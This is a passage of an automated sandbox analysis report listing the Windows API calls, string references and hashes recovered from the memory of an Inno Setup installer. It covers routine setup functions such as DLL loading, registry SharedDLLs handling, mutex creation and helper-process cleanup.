                                          • 6CAD5550.KERNEL32(00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F2BC
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000,?,?,00000001), ref: 0041F2D1
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8,00000000), ref: 0041F2E6
                                          • 6CAD5550.KERNEL32(00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister,?,004190B8), ref: 0041F2FB
                                          • 6CAD5550.KERNEL32(00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl,00000001,Ctl3dUnregister), ref: 0041F310
                                          • 6CAD5550.KERNEL32(00000001,BtnWndProc3d,00000001,Ctl3DColorChange,00000001,Ctl3dUnAutoSubclass,00000001,Ctl3dAutoSubclass,00000001,Ctl3dCtlColorEx,00000001,Ctl3dDlgFramePaint,00000001,Ctl3dSubclassDlgEx,00000001,Ctl3dSubclassCtl), ref: 0041F325
                                          • FreeLibrary.KERNEL32(00000001,?,004190B8,00000000,?,?,00000001,00000000), ref: 0041F337
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: D5550$ErrorLibraryMode$FreeLoadVersion
                                          • String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
                                          • API String ID: 4101126754-3614243559
                                          • Opcode ID: 75314b2eaa4bf69177d09f864bb6ec6c8c78ec8614df53f68c0acf1a6219d738
                                          • Instruction ID: b00500c56d477975086af7ab451da62873e29dfbcf9d38a71ba2b07221aa1eb7
                                          • Opcode Fuzzy Hash: 75314b2eaa4bf69177d09f864bb6ec6c8c78ec8614df53f68c0acf1a6219d738
                                          • Instruction Fuzzy Hash: BB31EDB0A51614AEEF00ABA5EDC6A5E3394E7087147100D7EB50497192D77C6C4A8F2C
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5AC50.USER32(00000000,?,0041AA0C,?), ref: 0041CB08
                                          • 72E5A590.GDI32(?,00000000,?,0041AA0C,?), ref: 0041CB14
                                          • 72E5A410.GDI32(0041AA0C,?,00000001,00000001,00000000,00000000,0041CD2A,?,?,00000000,?,0041AA0C,?), ref: 0041CB38
                                          • 72E5A520.GDI32(?,0041AA0C,?,00000000,0041CD2A,?,?,00000000,?,0041AA0C,?), ref: 0041CB48
                                          • SelectObject.GDI32(0041CF04,00000000), ref: 0041CB63
                                          • FillRect.USER32 ref: 0041CB9E
                                          • SetTextColor.GDI32(0041CF04,00000000), ref: 0041CBB3
                                          • SetBkColor.GDI32(0041CF04,00000000), ref: 0041CBCA
                                          • PatBlt.GDI32(0041CF04,00000000,00000000,0041AA0C,?,00FF0062), ref: 0041CBE0
                                          • 72E5A590.GDI32(?,00000000,0041CCE3,?,0041CF04,00000000,?,0041AA0C,?,00000000,0041CD2A,?,?,00000000,?,0041AA0C), ref: 0041CBF3
                                          • SelectObject.GDI32(00000000,00000000), ref: 0041CC24
                                          • 72E5B410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3,?,0041CF04,00000000,?,0041AA0C), ref: 0041CC3C
                                          • 72E5B150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3,?,0041CF04,00000000,?), ref: 0041CC45
                                          • 72E5B410.GDI32(0041CF04,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3), ref: 0041CC54
                                          • 72E5B150.GDI32(0041CF04,0041CF04,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CCD2,?,?,00000000,0041CCE3), ref: 0041CC5D
                                          • SetTextColor.GDI32(00000000,00000000), ref: 0041CC76
                                          • SetBkColor.GDI32(00000000,00000000), ref: 0041CC8D
                                          • 72E697E0.GDI32(0041CF04,00000000,00000000,0041AA0C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CCD2,?,?,00000000), ref: 0041CCA9
                                          • SelectObject.GDI32(00000000,?), ref: 0041CCB6
                                          • DeleteDC.GDI32(00000000), ref: 0041CCCC
                                            • Part of subcall function 0041A120: GetSysColor.USER32(?), ref: 0041A12A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Color$ObjectSelect$A590B150B410Text$A410A520DeleteE697FillRect
                                          • String ID:
                                          • API String ID: 3921020894-0
                                          • Opcode ID: d6d250347b78cab22f9e5047a66c506a469bac8e7be5dd0b898b332a2b22f203
                                          • Instruction ID: 290c54d875c6524fc3f19ced98f47c6901c6adc70a2cc63b7e88767eb8d85aa7
                                          • Opcode Fuzzy Hash: d6d250347b78cab22f9e5047a66c506a469bac8e7be5dd0b898b332a2b22f203
                                          • Instruction Fuzzy Hash: 4B61EF71A44604ABDB10EBE5DC86FEFB7B8EB48704F10446AF504E7281D67C9D508B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • AllocateAndInitializeSid.ADVAPI32(0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF56
                                          • GetVersion.KERNEL32(00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF73
                                          • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF8C
                                          • 6CAD5550.KERNEL32(00000000,advapi32.dll,CheckTokenMembership,00000000,0042E100,?,0048C79C,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042DF92
                                          • FreeSid.ADVAPI32(00000000,0042E107,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0FA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: AllocateD5550FreeHandleInitializeModuleVersion
                                          • String ID: CheckTokenMembership$advapi32.dll
                                          • API String ID: 1611730698-1888249752
                                          • Opcode ID: c9deeabe0e51be14b57a484d0583af0611c7fb3cdb7b7e1f9c5916997f3a1601
                                          • Instruction ID: f569368b677594a0ca59dd8d50db1b9a46e0ad1f5f47a6d2aae22f3b0f4dbcaf
                                          • Opcode Fuzzy Hash: c9deeabe0e51be14b57a484d0583af0611c7fb3cdb7b7e1f9c5916997f3a1601
                                          • Instruction Fuzzy Hash: 4A519471B042259EDB10EAE6DC86BBF77ACEF04704F90047BB900E6282D57D99018A6E
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • ShowWindow.USER32(?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000,?,0048B6ED,00000000,0048B6F7,?,00000000), ref: 0048B0A3
                                          • CreateMutexA.KERNEL32(00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000,?,0048B6ED,00000000), ref: 0048B0B6
                                          • ShowWindow.USER32(?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000,00000000), ref: 0048B0C6
                                          • MsgWaitForMultipleObjects.USER32 ref: 0048B0E7
                                          • ShowWindow.USER32(?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000,0048B3CD,?,?,00000000,?,00000000), ref: 0048B0F7
                                            • Part of subcall function 0042D394: GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,0042D41F,?,?,00000000,?,?,0048AA50,00000000,0048ABE3,?,?,00000005), ref: 0042D3C9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ShowWindow$CreateFileModuleMultipleMutexNameObjectsWait
                                          • String ID: .lst$.msg$/REG$/REGU$Inno-Setup-RegSvr-Mutex$Setup
                                          • API String ID: 2000705611-3672972446
                                          • Opcode ID: f0b5a17cc245d39787d778605bfe403336b8dd3094fe9eccddebbaafcdbfdac9
                                          • Instruction ID: e567365e2edbf44dac8aaf4dc4f34d553573b61eaa8a14842a563c927ff724aa
                                          • Opcode Fuzzy Hash: f0b5a17cc245d39787d778605bfe403336b8dd3094fe9eccddebbaafcdbfdac9
                                          • Instruction Fuzzy Hash: 5C91C230A042049FDB11FBA5C856BAEBBB4EB49704F5148A7F800AB792D77DAC05CB5D
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • 72E5A590.GDI32(00000000,?,00000000,?), ref: 0041B48B
                                          • 72E5A590.GDI32(00000000,00000000,?,00000000,?), ref: 0041B495
                                          • GetObjectA.GDI32(?,00000018,00000004), ref: 0041B4A7
                                          • 72E5A410.GDI32(0000000B,?,00000001,00000001,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4BE
                                          • 72E5AC50.USER32(00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4CA
                                          • 72E5A520.GDI32(00000000,0000000B,?,00000000,0041B523,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B4F7
                                          • 72E5B380.USER32(00000000,00000000,0041B52A,00000000,0041B523,?,00000000,?,00000018,00000004,00000000,00000000,?,00000000,?), ref: 0041B51D
                                          • SelectObject.GDI32(00000000,?), ref: 0041B538
                                          • SelectObject.GDI32(?,00000000), ref: 0041B547
                                          • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B573
                                          • SelectObject.GDI32(00000000,00000000), ref: 0041B581
                                          • SelectObject.GDI32(?,00000000), ref: 0041B58F
                                          • DeleteDC.GDI32(00000000), ref: 0041B598
                                          • DeleteDC.GDI32(?), ref: 0041B5A1
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Object$Select$A590Delete$A410A520B380Stretch
                                          • String ID:
                                          • API String ID: 956127455-0
                                          • Opcode ID: 0aa4171e73c738f3ed35fbf04f4c3f4c009d14ea486f04d193f536f391bd58e1
                                          • Instruction ID: 8e1c141f7ffe4df06b5d7521c42b4083d07a835c5a738f326f949a81a19cf48d
                                          • Opcode Fuzzy Hash: 0aa4171e73c738f3ed35fbf04f4c3f4c009d14ea486f04d193f536f391bd58e1
                                          • Instruction Fuzzy Hash: 8E41EF71E44609BFDB10EBE9D845FEFB7B8EB08704F104566B614FB281D6785E408BA4
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DCB4: 6CAD6790.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,004783BF,?,00000001,?,?,004783BF,?,00000001,00000000), ref: 0042DCD0
                                          • RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,?,00000000,?,00000000,004533A9,?,00457A86,00000003,00000000,00000000,004533E0), ref: 00453229
                                            • Part of subcall function 0042E6D0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF
                                          • RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,00000000,?,00000004,00000000,004532F3,?,00457A86,00000000,00000000,?,00000000,?,00000000), ref: 004532AD
                                          • RegQueryValueExA.ADVAPI32(00457A86,00000000,00000000,00000000,?,00000004,00000000,004532F3,?,00457A86,00000000,00000000,?,00000000,?,00000000), ref: 004532DC
                                          Strings
                                          • , xrefs: 0045319A
                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453147
                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00453180
                                          • RegOpenKeyEx, xrefs: 004531AC
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: QueryValue$D6790FormatMessage
                                          • String ID: $RegOpenKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                          • API String ID: 741102441-1577016196
                                          • Opcode ID: 291ee833736b765a42f7e4c3501b99a39aa0f47eb3096c290d65e24ef0e1b666
                                          • Instruction ID: 936de7cad3d5af6865a02f705fb0ee734affc7f522bca8c011dcaa03fd34f40a
                                          • Opcode Fuzzy Hash: 291ee833736b765a42f7e4c3501b99a39aa0f47eb3096c290d65e24ef0e1b666
                                          • Instruction Fuzzy Hash: CA912471904608ABDF10DF95C942BEEB7F8EB08345F10446BF904F7292DA799B09CB69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          • CloseHandle.KERNEL32(00000000), ref: 00456330
                                          • TerminateProcess.KERNEL32(00000000,00000001,00000000,00002710,00000000), ref: 0045634D
                                          • WaitForSingleObject.KERNEL32(00000000,00002710,00000000), ref: 0045635A
                                          • GetExitCodeProcess.KERNEL32 ref: 0045636A
                                          • CloseHandle.KERNEL32(00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563B0
                                          • Sleep.KERNEL32(000000FA,00000000,00000000,?,00000000,00002710,00000000,00000001,00000000,00002710,00000000), ref: 004563C9
                                          Strings
                                          • Helper process exited with failure code: 0x%x, xrefs: 00456397
                                          • Helper process exited, but failed to get exit code., xrefs: 004563A3
                                          • Stopping 64-bit helper process., xrefs: 00456320
                                          • Helper process exited., xrefs: 00456379
                                          • Helper isn't responding; killing it., xrefs: 0045633E
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseHandleProcess$CodeExitLocalObjectSingleSleepTerminateTimeWait
                                          • String ID: Helper isn't responding; killing it.$Helper process exited with failure code: 0x%x$Helper process exited, but failed to get exit code.$Helper process exited.$Stopping 64-bit helper process.
                                          • API String ID: 3354603272-531598853
                                          • Opcode ID: 82dd5589c4a1b1667aa46219dc32579f794879d120c0b2f60b41663e5ed864c5
                                          • Instruction ID: 9b7f2ab07430efa22c8a7431e96b691d9f1dfba80aa7278ab83026af9fdd60fa
                                          • Opcode Fuzzy Hash: 82dd5589c4a1b1667aa46219dc32579f794879d120c0b2f60b41663e5ed864c5
                                          • Instruction Fuzzy Hash: CD11AF70A057009ADB10AB68888575E23D48F08305F45882FBEC5DB2D3C73C884CDB2F
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0042DC7C: 6CAD64E0.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DCA8
                                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00452EEB
                                          • RegCloseKey.ADVAPI32(?,?,?,00000000,00000004,00000000,00000001,?,00000000,?,00000000,00452F9B,?,00000000,0045305F), ref: 00453027
                                            • Part of subcall function 0042E6D0: FormatMessageA.KERNEL32(00003200,00000000,4C783AFB,00000000,?,00000400,00000000,?,00451D17,00000000,kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000), ref: 0042E6EF
                                          Strings
                                          • RegCreateKeyEx, xrefs: 00452E5F
                                          • , xrefs: 00452E4D
                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E33
                                          • Software\Microsoft\Windows\CurrentVersion\SharedDLLs, xrefs: 00452E03
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: CloseFormatMessageQueryValue
                                          • String ID: $RegCreateKeyEx$Software\Microsoft\Windows\CurrentVersion\SharedDLLs$Software\Microsoft\Windows\CurrentVersion\SharedDLLs
                                          • API String ID: 2240843642-1280779767
                                          • Opcode ID: 9613e4855c050960e8fa881c17536d95f92b4673aaa077709d432140edc12092
                                          • Instruction ID: 65fa3514b9301d2a41a7ae804044056a1f5ce6c6599497d784368b85e637474e
                                          • Opcode Fuzzy Hash: 9613e4855c050960e8fa881c17536d95f92b4673aaa077709d432140edc12092
                                          • Instruction Fuzzy Hash: 21811F72900209AFDB10DFE5D941BEFB7B8EB09705F10442BF904F7292D7799A098B69
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetLastError.KERNEL32(00000000,004578DF,?,?,?,?), ref: 00457791
                                            • Part of subcall function 00451424: 6CAD5F60.KERNEL32(00000000,00000000,00451481,?,-00000001,?), ref: 0045145B
                                            • Part of subcall function 00451424: GetLastError.KERNEL32(00000000,00000000,00451481,?,-00000001,?), ref: 00451463
                                            • Part of subcall function 00455B64: GetLocalTime.KERNEL32(?,00000000,00455CEB,?,?,0048DF10,00000000), ref: 00455B94
                                          Strings
                                          • Failed to strip read-only attribute., xrefs: 00457776
                                          • Deleting file: %s, xrefs: 00457730
                                          • Failed to delete the file; it may be in use (%d)., xrefs: 00457880
                                          • .HLP, xrefs: 004576D3
                                          • .GID, xrefs: 004576E4
                                          • .FTS, xrefs: 004576FD
                                          • The file appears to be in use (%d). Will delete on restart., xrefs: 004577DA
                                          • Stripped read-only attribute., xrefs: 0045776A
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: ErrorLast$LocalTime
                                          • String ID: .FTS$.GID$.HLP$Deleting file: %s$Failed to delete the file; it may be in use (%d).$Failed to strip read-only attribute.$Stripped read-only attribute.$The file appears to be in use (%d). Will delete on restart.
                                          • API String ID: 3586426482-88052198
                                          • Opcode ID: c53927524a0be121146ecac79b4154f9cb06472446eed1adc4c29ecd637aa9d7
                                          • Instruction ID: d1a5732fae48b35c6b067986d8cdc98c863a1d332040d828df944f2f84c25ea7
                                          • Opcode Fuzzy Hash: c53927524a0be121146ecac79b4154f9cb06472446eed1adc4c29ecd637aa9d7
                                          • Instruction Fuzzy Hash: 7B51DB30B082445BDB00EB69A8857AE7BA5AB49315F00847AEC009B393C77C9E4DCB99
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                            • Part of subcall function 0045229C: 6CAD5CA0.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045238B
                                            • Part of subcall function 0045229C: CloseHandle.KERNEL32(00000000,00000000,C0000000,00000000,00000000,00000002,00000080,00000000,.tmp,00489BF1,_iu,?,00000000,004523D6), ref: 0045239B
                                          • 6CAD5AA0.KERNEL32(00000000,00000000,00000000,00000000,00489BF1), ref: 00489A9D
                                          • 6CAD69D0.KERNEL32(00000000,00000080,00000000,00000000,00000000,00000000,00489BF1), ref: 00489ABE
                                          • CreateWindowExA.USER32 ref: 00489AE5
                                          • SetWindowLongA.USER32 ref: 00489AF8
                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000,STATIC,00489C00), ref: 00489B28
                                          • MsgWaitForMultipleObjects.USER32 ref: 00489B9C
                                          • CloseHandle.KERNEL32(?,?,?,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000), ref: 00489BA8
                                            • Part of subcall function 004525EC: WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000), ref: 004526D3
                                          • 72E69840.USER32(?,00489BCB,00000000,00000000,00000000,00000000,00000000,00000097,00000000,00489BC4,?,?,000000FC,00489474,00000000,STATIC), ref: 00489BBE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373584738.000000000048C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373600565.00000000004AE000.00000004.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373616558.00000000004BC000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          • Associated: 00000004.00000002.373626287.00000000004C4000.00000002.00000001.01000000.00000005.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_4_2_400000_is-DTRND.jbxd
                                          Similarity
                                          • API ID: Window$CloseHandle$CreateE69840LongMultipleObjectsPrivateProfileStringWaitWrite
                                          • String ID: /SECONDPHASE="%s" /FIRSTPHASEWND=$%x $STATIC
                                          • API String ID: 2316613676-2312673372
                                          • Opcode ID: b6d81cb5deb64343c64eaf6fd9441b967f929e7c7847470b12341b3c670fdddb
                                          • Instruction ID: f15b8aae4c78235ced6120211af2219e00c220a19f9896692e628c5bb0c8e16d
                                          • Opcode Fuzzy Hash: b6d81cb5deb64343c64eaf6fd9441b967f929e7c7847470b12341b3c670fdddb
                                          • Instruction Fuzzy Hash: 78415D71A00608AEDF10FBA5DC42FAE77F8EB09714F10497AF510F7291D679AE008B68
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          APIs
                                          • GetActiveWindow.USER32 ref: 0042E9A8
                                          • GetModuleHandleA.KERNEL32(user32.dll), ref: 0042E9BC
                                          • 6CAD5550.KERNEL32(00000000,MonitorFromWindow,user32.dll), ref: 0042E9C9
                                          • 6CAD5550.KERNEL32(00000000,GetMonitorInfoA,00000000,MonitorFromWindow,user32.dll), ref: 0042E9D6
                                          • GetWindowRect.USER32 ref: 0042EA22
                                          • SetWindowPos.USER32(?,00000000,?,?,00000000,00000000,0000001D,?,00000000), ref: 0042EA60
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000004.00000002.373506640.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000004.00000002.373501727.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
